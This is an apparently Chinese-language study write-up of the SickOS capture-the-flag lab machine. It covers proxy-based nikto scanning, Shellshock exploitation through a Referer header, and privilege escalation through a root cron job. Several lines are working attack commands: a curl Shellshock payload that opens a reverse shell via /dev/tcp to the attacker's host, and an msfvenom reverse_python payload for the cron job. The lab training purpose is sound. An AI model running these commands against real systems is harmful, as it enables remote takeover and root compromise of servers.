靶机精讲之SickOS-方法2

主机发现

靶机精讲之SickOS-方法2_第1张图片

 用代理扫描

nikto扫描

sudo nikto -h 192.168.10.191 -useproxy http://192.168.10.191/3128

靶机精讲之SickOS-方法2_第2张图片

 靶机精讲之SickOS-方法2_第3张图片

 shellshock漏洞原理靶机精讲之SickOS-方法2_第4张图片

 验证有没有shellshock漏洞

用curl挂代理

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:(){ test:}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

shellshock漏洞验证

靶机精讲之SickOS-方法2_第5张图片

 

 存在

获取初始系统shell

msfvenom 生成后门

生成payload

靶机精讲之SickOS-方法2_第6张图片

 建立监听

靶机精讲之SickOS-方法2_第7张图片

 执行命令(修改路径)

 把上面指令复制

无反应,路径应该要完整

重新开始监听

靶机精讲之SickOS-方法2_第8张图片

 加上完整路径sh前加上/bin/

靶机精讲之SickOS-方法2_第9张图片

 每个空格字母都要主要

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:() { test;}; 0<&108-;exec 108<>/dev/tcp/192.168.10.153/443;/bin/sh <&108 >&108 2>&108"

反弹成功,半个shell

靶机精讲之SickOS-方法2_第10张图片

 靶机精讲之SickOS-方法2_第11张图片

 dpkg -l 查看装的软件

运行python,获得更好的shell

 看权限

 返回翻文件

靶机精讲之SickOS-方法2_第12张图片

 靶机精讲之SickOS-方法2_第13张图片

 靶机精讲之SickOS-方法2_第14张图片

 翻网站

靶机精讲之SickOS-方法2_第15张图片

 看目录

靶机精讲之SickOS-方法2_第16张图片

 靶机精讲之SickOS-方法2_第17张图片

 执行python

 执行ls liah cr*(检索关键字)

Cron自动任务提权

靶机精讲之SickOS-方法2_第18张图片

cat crontab
靶机精讲之SickOS-方法2_第19张图片

****root,定时命令

可以把命令植入该路径

 生成payload

sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.10.153 lport=444 -f raw

rooted

靶机精讲之SickOS-方法2_第20张图片

 把python -c后的生成码粘贴不带“

 靶机精讲之SickOS-方法2_第21张图片

 输入o,然后粘贴payload

 (靶机环境崩坏,结束做笔记)

 靶机精讲之SickOS-方法2_第22张图片

 回弹拿shell成功

靶机精讲之SickOS-方法2_第23张图片

 靶机精讲之SickOS-方法2_第24张图片

 

你可能感兴趣的:(服务器,linux,运维)